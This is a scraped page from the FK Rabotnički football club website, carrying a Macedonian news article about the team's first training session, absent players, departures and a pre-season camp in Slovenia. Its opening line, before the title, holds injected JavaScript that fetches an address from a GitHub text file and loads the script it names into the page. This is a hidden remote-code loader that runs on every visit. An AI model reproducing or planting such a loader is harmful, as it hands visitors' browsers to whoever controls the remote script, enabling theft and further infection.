;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Работнички почна со тренинзи, формата ќе се темпира во Словенија
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Работнички почна со тренинзи, формата ќе се темпира во Словенија

Шефот на стручниот штаб на Работнички, Томислав Франц, денеска ја одржа првата прозивка, со што официјално беше означен стартот на подготовките за новата сезона на „романтичарите“. Освоеното четврто место му донесе на нашиот клуб нов пласман во европските купови, каде останува желбата да се повтори ланскиот успех и да се минат неколку рунди во квалификациите за Лигата на Европа.

На првата прозивка не се појавија капитенот Милан Илиевски, потоа Алтипармаковски, браќата Сахити, како и Најденов, Шишковски, Маркоски, Елмаз и Јанков.

Фудбалерите имаа доволен период за одмор и од денеска почнуваме со редовните тренинзи. Можеби со мали проблеми, затоа што Бојан Најденов е со А-репрезентацијата, Шишковски, Кире Маркоски и Елмаз се со младата репрезентација, Милан Ристовски и Ристе Јанков се со репрезентацијата до 18. години. Браќата Сахити поради технички проблеми со документација за пасошот исто така не се на денешниот тренинг, а отсутни се и Марјан Алтипармаковски и Милан Илиевски. Некои од нив ќе бидат отсутни пет, а некои три дена. Во меѓувреме, очекуваме тројца или четворица нови фудбалери“ – истакна Франц.

Уште на самиот старт од подготовките е јасно дека дел од ланските играчи нема да го носат дресот на „романтичарите“ во следната сезона.

Борче Маневски, Мирослав Јовановски, Бојан Марковски тие веќе не се членови на Работнички, а истото веројатно ќе се случи со Милован Петровиќ, кој е во преговори со Дебрецин, и сакам да му посакам среќна, меѓународна кариера. Тука ќе работиме до 5. јуни, а веќе на 6-ти заминуваме за Словенија. Имаме закажано три пријателски натпревари, противниците се уште не ни се познати, и таму ќе се задржиме до 14. јуни. После тоа се враќаме во Скопје, каде што ќе бидеме во исчекување на противникот, и да ги финализираме подготовките за европските натпреварувања. Јас, а целата управа посакуваме Работнички да има исто успешно лето како и минатото, но времето ќе покаже дали ќе биде така“ – посочи тренерот Томислав Франц.

prozivka2 tomislav franc

prozivka1

prozivka3

prozivka5

prozivka6

prozivka7

prozivka8

prozivka9

Leave a Reply